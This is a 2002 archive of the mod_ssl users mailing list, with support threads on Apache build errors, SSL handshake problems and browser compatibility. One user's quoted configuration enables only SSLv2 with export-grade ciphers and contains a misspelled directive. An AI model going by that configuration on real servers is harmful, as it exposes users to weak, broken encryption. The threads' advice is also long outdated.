From owner-modssl-users@modssl.org  Sat Aug 31 11:27:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA13631; Sat, 31 Aug 2002 11:26:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA13617; Sat, 31 Aug 2002 11:25:50 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 446FE4CE770; Sat, 31 Aug 2002 11:25:49 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 448E428836; Sat, 31 Aug 2002 11:22:16 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from apd-mail2.aerojetpd.com id XAA01431; Fri, 30 Aug 2002 23:56:06 +0200 (MET DST)
Message-ID: 
From: "Almada, Jon F" 
To: "'modssl-users@modssl.org'" 
Subject: Problem compiling Apache with modssl on HPUX system...
Date: Fri, 30 Aug 2002 14:54:51 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Almada, Jon F" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I am attempting to compile Apache with the Mod-SSL modules per the
instructions on 
the site. I am running on a HP-UX 11 machine and everything went fine until
I began 
compiling the Apache server - Any advice about how to get out of this pickle
would 
most certainly be appreciated ;>)

Sincerely,

Jon F. Almada
Web Developer
GenCorp-Aerojet

        rm -f libmain.a
        ar cr libmain.a alloc.o buff.o  http_config.o http_core.o http_log.o
ht
tp_main.o http_protocol.o http_request.o http_vhost.o  util.o util_date.o
util_s
cript.o util_uri.o util_md5.o  rfc1413.o
        /bin/true libmain.a
<=== src/main
===> src/lib
===> src/lib/expat-lite
<=== src/lib/expat-lite
<=== src/lib
===> src/modules
===> src/modules/standard
<=== src/modules/standard
===> src/modules/ssl
        flex -Pssl_expr_yy -s -B ssl_expr_scan.l
Make: Cannot load flex.  Stop.
*** Error exit code 1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 31 11:27:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA13646; Sat, 31 Aug 2002 11:26:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA13619; Sat, 31 Aug 2002 11:25:51 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8FBA74CE74D; Sat, 31 Aug 2002 11:25:49 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 06F8628875; Sat, 31 Aug 2002 11:22:48 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bjapp10.163.net id IAA10794; Sat, 31 Aug 2002 08:46:33 +0200 (MET DST)
Received: by bjapp10.163.net (Postfix, from userid 1005)
	id 350941C701EC2; Sat, 31 Aug 2002 14:46:34 +0800 (CST)
MIME-Version: 1.0
Message-ID: <3D70664A.00001F.24326@bjapp10>
Date: Sat, 31 Aug 2002 14:46:34 +0800 (CST)
From: "Eric Fung" 
To: modssl-users@modssl.org
Subject: =?gb2312?B?bW9kX3NzbDplcnJvcg==?=
X-Priority: 3
X-Originating-IP: [61.142.99.100]
X-Mailer: Coremail2.0 Copyright Tebie Ltd., 2001
Content-Type: Multipart/Alternative; boundary="Boundary-=_ZMbBDMnQtKsorfJhTyJkZVqoMzgh"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Eric Fung" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

--Boundary-=_ZMbBDMnQtKsorfJhTyJkZVqoMzgh
Content-Type: text/plain; charset="gb2312"
Content-Transfer-Encoding: 8bit

Dear master:
   I'm using mod_ssl 2.8.10 for Apache 1.3.26, but when I using internet explorer, netscape, opera and so on, it can't connect https://192.168.0.1, but I can use lynx to connect it. But I can see next message from ssl_request_log.
----------------------
20/Jul/2002:17:56:21 +0800] 192.168.0.2 - - "GET /mod_ssl:error:HTTP-request HTT[20/Jul/2002:14:04:53 +0800] 192.168.0.2 - - "GET /mod_ssl:error:HTTP-request HTTP/1.0" 514
---------------------
What's the matter?
 thanks
--Boundary-=_ZMbBDMnQtKsorfJhTyJkZVqoMzgh
Content-Type: text/html; charset="gb2312"
Content-Transfer-Encoding: 8bit

Dear master:
   I'm using mod_ssl 2.8.10 for Apache 1.3.26, but when I using internet explorer, netscape, opera and so on, it can't connect https://192.168.0.1, but I can use lynx to connect it. But I can see next message from ssl_request_log.
----------------------
20/Jul/2002:17:56:21 +0800] 192.168.0.2 - - "GET /mod_ssl:error:HTTP-request HTT[20/Jul/2002:14:04:53 +0800] 192.168.0.2 - - "GET /mod_ssl:error:HTTP-request HTTP/1.0" 514
---------------------
What's the matter?
 thanks

 


  
 
    
      ¡¤TOM¶ÌÐÅÍƳö×îзþÎñ ¡°¶ÌÐÅÊղؼС±

¡¡½«¶ÌÐÅ·¢Ë͵½800+×Ô¼ºÊÖ»úºÅÂ룬¼´¿É½«¶ÌÐÅÏ¢´æ½øÊղؼС£

¡¡¼´Ê¹ÊÇÔÙ¶àµÄ¶ÌÐÅÒ²²»³îû´¦·ÅÁË£¡ÏêÇéÇë¿´http://www.163.net/sms/save/




      ¡¤ÆóÒµÉÌÎñÏÈ»ú - ÆóÒµÓÊÏä´ÙÏúÓÅ»Ý ÏêÇéÇë¿´http://mail.163.net

      ¡¤[ÿÈÕһЦ] »Ã¾õ£º¾«Éñ²¡¿ÆÒ½Éú£º¡°´ÓÇ°Äã×ÜÒÔΪ×Ô¼ºÊÇ´÷°²ÄÈ£¬ÏÖÔÚÎҺܸßÐ˵ĸæËßÄ㣬ÄãÒѾ­¡­¡­

      ¡¤[ÿÈÕÐÇÎÅ] ½ðÐǵÄħ·¨£ºÔÚÕ¼ÐÇѧÀïÃ棬½ðÐÇÏóÕ÷×ÅÓäÔá£Òò´Ë£¬Èç¹ûÏëÈÃ×Ô¼ºµÄÐÄÇéÊ泩һЩ£¬±ØÐëÒª¡­¡­
    		
  




  



  
 
    163.net 
      ÊÕ·ÑÓÊÏä
    163.net 
      ´«ÕæÒ×
  

  
 
    °×½ð°æ
 (100 
      M ,¿É·¢10M¸½¼þ)		
    »Æ½ð°æ
 (60 
      M ,¿É·¢10M¸½¼þ)		
    Fax 
      to Email

      ÓÃÓÊÏä½ÓÊÕ´«Õæ 		
    Email 
      to Fax

      ÓÃÓÊÏä·¢ËÍ´«Õæ 		
  

  
 
    300Ôª/Äê

      (ËÍ1200ÌõÓʼþ¶ÌÐÅ) 		
    180Ôª/Äê

      (ËÍ720ÌõÓʼþ¶ÌÐÅ)		
    25Ôª/ÔÂ

      (²»ÏÞ½ÓÊÕ´«Õæ´ÎÊý) 		
    ×îµÍÔ¤¸¶200Ôª

      (·ÑÓñȳ¤Í¾¸ü±ãÒË)		
  

  
 
    ÄÚÖÃÈðÐÇɱ¶¾ | À¬»øÓʼþ¹ýÂË | 
      Ö§³ÖÊÖ»úÓʼþ

    ¼òµ¥Ò×Óà | ʡֽʡʱ | Ⱥ·¢¹¦ÄÜ 
      | ÓïÒôÁôÑÔ
  






--Boundary-=_ZMbBDMnQtKsorfJhTyJkZVqoMzgh--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 31 16:23:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA21344; Sat, 31 Aug 2002 16:22:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from illustrious.cnchost.com id QAA21339; Sat, 31 Aug 2002 16:22:04 +0200 (MET DST)
Received: from calvin (adsl-66-122-60-37.dsl.sntc01.pacbell.net [66.122.60.37])
	by illustrious.cnchost.com
	id KAA28005; Sat, 31 Aug 2002 10:21:53 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
Message-ID: <000701c250f9$ca4c1de0$0401a8c0@calvin>
From: "Gilles Gros" 
To: 
References: 
Subject: Re: Problem compiling Apache with modssl on HPUX system...
Date: Sat, 31 Aug 2002 07:22:08 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Gros" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You need to have felx and bison installed and accessible in your path.

Gilles
----- Original Message -----
From: "Almada, Jon F" 
To: 
Sent: Friday, August 30, 2002 2:54 PM
Subject: Problem compiling Apache with modssl on HPUX system...


> Hello,
>
> I am attempting to compile Apache with the Mod-SSL modules per the
> instructions on
> the site. I am running on a HP-UX 11 machine and everything went fine
until
> I began
> compiling the Apache server - Any advice about how to get out of this
pickle
> would
> most certainly be appreciated ;>)
>
> Sincerely,
>
> Jon F. Almada
> Web Developer
> GenCorp-Aerojet
>
>         rm -f libmain.a
>         ar cr libmain.a alloc.o buff.o  http_config.o http_core.o
http_log.o
> ht
> tp_main.o http_protocol.o http_request.o http_vhost.o  util.o util_date.o
> util_s
> cript.o util_uri.o util_md5.o  rfc1413.o
>         /bin/true libmain.a
> <=== src/main
> ===> src/lib
> ===> src/lib/expat-lite
> <=== src/lib/expat-lite
> <=== src/lib
> ===> src/modules
> ===> src/modules/standard
> <=== src/modules/standard
> ===> src/modules/ssl
>         flex -Pssl_expr_yy -s -B ssl_expr_scan.l
> Make: Cannot load flex.  Stop.
> *** Error exit code 1
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 31 17:28:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA22392; Sat, 31 Aug 2002 17:27:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts20-srv.bellnexxia.net id RAA22386; Sat, 31 Aug 2002 17:26:46 +0200 (MET DST)
Received: from sympatico.ca ([64.231.120.51]) by tomts20-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020831152649.EKUI29362.tomts20-srv.bellnexxia.net@sympatico.ca>
          for ; Sat, 31 Aug 2002 11:26:49 -0400
Message-ID: <3D70E048.1060503@sympatico.ca>
Date: Sat, 31 Aug 2002 11:27:04 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problem compiling Apache with modssl on HPUX system...
References:  <000701c250f9$ca4c1de0$0401a8c0@calvin>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Gilles Gros wrote:
> You need to have felx and bison installed and accessible in your path.
> 
> Gilles
> ----- Original Message -----
> From: "Almada, Jon F" 
> To: 
> Sent: Friday, August 30, 2002 2:54 PM
> Subject: Problem compiling Apache with modssl on HPUX system...
> 
> 
> 
>>Hello,
>>
>>I am attempting to compile Apache with the Mod-SSL modules per the
>>instructions on
>>the site. I am running on a HP-UX 11 machine and everything went fine
> 
> until
> 
>>I began
>>compiling the Apache server - Any advice about how to get out of this
> 
> pickle
> 
>>would
>>most certainly be appreciated ;>)
>>
>>Sincerely,
>>
>>Jon F. Almada
>>Web Developer
>>GenCorp-Aerojet
>>
>>        rm -f libmain.a
>>        ar cr libmain.a alloc.o buff.o  http_config.o http_core.o
> 
> http_log.o
> 
>>ht
>>tp_main.o http_protocol.o http_request.o http_vhost.o  util.o util_date.o
>>util_s
>>cript.o util_uri.o util_md5.o  rfc1413.o
>>        /bin/true libmain.a
>><=== src/main
>>===> src/lib
>>===> src/lib/expat-lite
>><=== src/lib/expat-lite
>><=== src/lib
>>===> src/modules
>>===> src/modules/standard
>><=== src/modules/standard
>>===> src/modules/ssl
>>        flex -Pssl_expr_yy -s -B ssl_expr_scan.l
>>Make: Cannot load flex.  Stop.
>>*** Error exit code 1
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

In the interest of preventing another misunderstanding...

Giles meant 'flex' not felx...
 > You need to have felx and bison installed and accessible in your path.

Chris.
(please excuse me if it was already obvious)



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Sep  1 14:36:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA13774; Sun, 1 Sep 2002 14:35:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id OAA13763; Sun, 1 Sep 2002 14:34:20 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 91AB14CE74D; Sun,  1 Sep 2002 14:34:19 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 0C53F28834; Sun,  1 Sep 2002 14:33:48 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from outlander.us id KAA09985; Sun, 1 Sep 2002 10:48:56 +0200 (MET DST)
content-class: urn:content-classes:message
Subject: Apache Operations?
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Date: Sun, 1 Sep 2002 01:01:21 -0800
Message-ID: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Thread-Topic: Apache Operations?
Thread-Index: AcJRlJEQtOmRq5EFS6i2kuWE3F+Ayg==
From: "Mark-Nathaniel Weisman" 
To: 
Cc: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA09986
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mark-Nathaniel Weisman" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This may be a little off topic, but I can't find any other place to post
it. I have a apache web server running inside my network behind a
firewall. The firewall is using NATD/IPFW to forward IP packets through
based on port address assignment. I wondering how I can route a request
to a specific domain name from the main webserver to another server with
a class C address? And only for the singular domain name? Any
suggestions?

His humble servant,
Mark-Nathaniel Weisman
President
Outland Domain Group Consulting
Anchorage,AK USA
http://www.outlander.us
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Sep  1 19:11:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA18964; Sun, 1 Sep 2002 19:10:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA18952; Sun, 1 Sep 2002 19:09:24 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 807FB4CE620; Sun,  1 Sep 2002 19:09:24 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 62B0A285E0; Sun,  1 Sep 2002 19:07:25 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from scanmail4.cableone.net id QAA15952; Sun, 1 Sep 2002 16:44:31 +0200 (MET DST)
Received: from scanmail4.cableone.net ([10.116.0.124]) by scanmail4.cableone.net  with Microsoft SMTPSVC(5.5.1877.687.68);
	 Sun, 1 Sep 2002 07:43:43 -0700
Received: from scanmail4.cableone.net [24.116.0.124] by scanmail4.cableone.net
  (SMTPD32-7.04) id A77F81420044; Sun, 01 Sep 2002 07:43:11 -0700
Received: from achilles (223-33.porcpe.cableone.net [24.116.223.33]) by mail.cableone.net with SMTP (MailShield v2.04 - WIN32 Jul 17 2001 17:12:42); Sun, 01 Sep 2002 07:43:10 -0600
From: "VMaxx" 
To: 
Subject: Win32 1.3.26 and 2.8.10
Date: Sun, 1 Sep 2002 09:44:09 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
X-SMTP-HELO: achilles
X-SMTP-MAIL-FROM: vmaxx@cableone.net
X-SMTP-PEER-INFO: 223-33.porcpe.cableone.net [24.116.223.33]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "VMaxx" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I've done all kinds of configuration modifications etc, and it handshakes
but drops immediately after.  It appears that others have been having the
same results.  So I was wondering, Has anyone successfully gotten it to work
on Win32?

Thanks
Shane
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  2 05:01:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA29163; Mon, 2 Sep 2002 05:00:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rdsl_mlb_mx1.requestdsl.com.au id EAA29044; Mon, 2 Sep 2002 04:59:48 +0200 (MET DST)
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Macs not able to access 128bit Security sites?
Date: Mon, 2 Sep 2002 12:57:12 +1000
Message-ID: <25B12856E53F0047BE90FB2CFC0D1B59119679@rdsl_mlb_mx1.requestdsl.com.au>
Thread-Topic: Macs not able to access 128bit Security sites?
Thread-Index: AcJN37o01ww7+XKwR8Cu5ZHamWWYGQEP59lA
From: "Vince Montuoro" 
To: 
Cc: , 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id FAA29074
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Vince Montuoro" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi guys,

I still can't get macs to access my secure site.....

can you see anything wrong with the following setup 

PLEASE HELP ME.....:(


        BrowserMatch ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0 


# see http://www.modssl.org/docs/2.8/ssl_reference.html for more info
SSLMutex sem
SSLRandomSeed startup builtin
SSLSessionCache none


SSLProtocol -ALL +SSLv2 
SSLOptions +CompatEnvVars +OptRenegotiate 
SLCipherSuite SSLv2:+HIGH:+MEDIUM:+LOW:+EXP 



SSLLog logs/SSL.log
SSLLogLevel warn
# You can later change "info" to "warn" if everything is OK


SSLEngine On
SSLCertificateFile conf/ssl/certs/my-server.cert
SSLCertificateKeyFile conf/ssl/private/my-server.key
SSLCACertificateFile conf/ssl/ssl.crt/ca.crt 



thankyou,
Vince

-----Original Message-----
From: Robert J. Pope [mailto:list-modssl-users@extromedia.com]
Sent: Wednesday, 28 August 2002 1:35 AM
To: modssl-users@modssl.org
Subject: RE: Macs not able to access 128bit Security sites?


Rob,

I thought I'd try it too. With MSIE 5.2.1(4717) On MacOS X (Jaguar), I
was successfully able to access the site and connected with via an
RC4-128 cipher. I also see you're using an Entrust cert as apposed to
Verisign... Interesting.

- Robert

On Tue, 2002-08-27 at 10:33, Robert Lagana wrote:
> Ben,
> 
> Can you try this site https://www.xe.com
> 
> Thanks,
> Rob
> 
> -----Original Message-----
> From: Ben Ricker [mailto:bricker@wellinx.com]
> Sent: Tuesday, August 27, 2002 9:25 AM
> To: Modssl List
> Subject: Re: Macs not able to access 128bit Security sites?
> 
> 
> The cipher is located within the browsers which is different then the
> way Microsoft puts it in the system (hence the patch to upgrade the
> cipher).
> 
> Anyway, I use IE 5.1 for Mac on OS9 and have no problem with 128-bit
> sites. Are you using OSX?
> 
> Ben Ricker
> Web Security System Administrator
> Wellinx.com
> 
> On Tue, 2002-08-27 at 01:48, Vince Montuoro wrote:
> > Hi guys,
> > Just wondered if anyone encountered issues with Macs not able to access
> 128 bit encrypted sites?  
> > 
> > (The Particular Mac in question is a Powerbook G3  )
> > 
> > I have also encountered problems with IE5 and IE6 where by the only way I
> could get access to the site was by upgrading the security patches on the IE
> version. Mac on the other hand has 128 bit encryption standard.
> > 
> > PLEASE HELP
> > 
> > Vince
> > vmontuoro@request.com.au
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  2 06:48:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA01425; Mon, 2 Sep 2002 06:47:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rdsl_mlb_mx1.requestdsl.com.au id GAA01421; Mon, 2 Sep 2002 06:47:02 +0200 (MET DST)
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Win32 1.3.26 and 2.8.10
Date: Mon, 2 Sep 2002 14:44:27 +1000
Message-ID: <25B12856E53F0047BE90FB2CFC0D1B5935B70B@rdsl_mlb_mx1.requestdsl.com.au>
Thread-Topic: Win32 1.3.26 and 2.8.10
Thread-Index: AcJR2n5tUHCqrt+DSSWd1UjG1lgUoAAX9Q/g
From: "Vince Montuoro" 
To: 
Cc: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id GAA01422
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Vince Montuoro" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Did you download the install file from modssl.org\contrib page?

if not go there and here is a great page to help you install Apache with modssl 
http://www.serverwatch.com/tutorials/article.php/1437211
and mysql installation if your interested 
http://www.serverwatch.com/tutorials/article.php/1441631


Good Luck 

Vince

p.s IF YOU GET  AN APPLE IMAC ACCESSING THE SITE EMAIL ME YOUR WORKING CONFIG PLEASE.



-----Original Message-----
From: VMaxx [mailto:vmaxx@cableone.net]
Sent: Monday, 2 September 2002 12:44 AM
To: modssl-users@modssl.org
Subject: Win32 1.3.26 and 2.8.10


I've done all kinds of configuration modifications etc, and it handshakes
but drops immediately after.  It appears that others have been having the
same results.  So I was wondering, Has anyone successfully gotten it to work
on Win32?

Thanks
Shane
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  2 09:43:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA05420; Mon, 2 Sep 2002 09:42:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id JAA05416; Mon, 2 Sep 2002 09:41:30 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g827eWP28812;
	Mon, 2 Sep 2002 08:40:52 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Mon, 2 Sep 2002 08:40:26 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02067423@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Cc: mark@outlander.us
Subject: RE: Apache Operations?
Date: Mon, 2 Sep 2002 08:40:24 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

That depends on which firewall you have. Mail me off the list with details
and I'll see what I can do to help.

I was hoping to speak at this year's apachecon on "Apache and Firewalls",
but it wasn't to be! Maybe next year...

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Reality TV - the ultimate oxymoron


> -----Original Message-----
> From: Mark-Nathaniel Weisman [mailto:mark@outlander.us]
> Sent: 01 September 2002 10:01
> To: users@httpd.apache.org
> Cc: modssl-users@modssl.org
> Subject: Apache Operations?
> 
> 
> This may be a little off topic, but I can't find any other 
> place to post
> it. I have a apache web server running inside my network behind a
> firewall. The firewall is using NATD/IPFW to forward IP 
> packets through
> based on port address assignment. I wondering how I can route 
> a request
> to a specific domain name from the main webserver to another 
> server with
> a class C address? And only for the singular domain name? Any
> suggestions?
> 
> His humble servant,
> Mark-Nathaniel Weisman
> President
> Outland Domain Group Consulting
> Anchorage,AK USA
> http://www.outlander.us
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  2 11:31:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA07760; Mon, 2 Sep 2002 11:30:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA07692; Mon, 2 Sep 2002 11:29:33 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 59F4B4CE6E2; Mon,  2 Sep 2002 11:29:32 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 527D128837; Mon,  2 Sep 2002 11:29:14 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lnx1.i.ecos.de id KAA06070; Mon, 2 Sep 2002 10:13:27 +0200 (MET DST)
Received: from wingr1 (unknown [10.11.12.11])
	by lnx1.i.ecos.de (Postfix) with SMTP id 09CF69DE81
	for ; Mon,  2 Sep 2002 10:13:25 +0200 (MEST)
Message-ID: <00b401c25259$51e95b90$0b0c0b0a@gr.ecos.de>
From: "Gerald Richter" 
To: 
Subject: Avoid client certificate dialog, when client has no certificate
Date: Mon, 2 Sep 2002 10:18:29 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
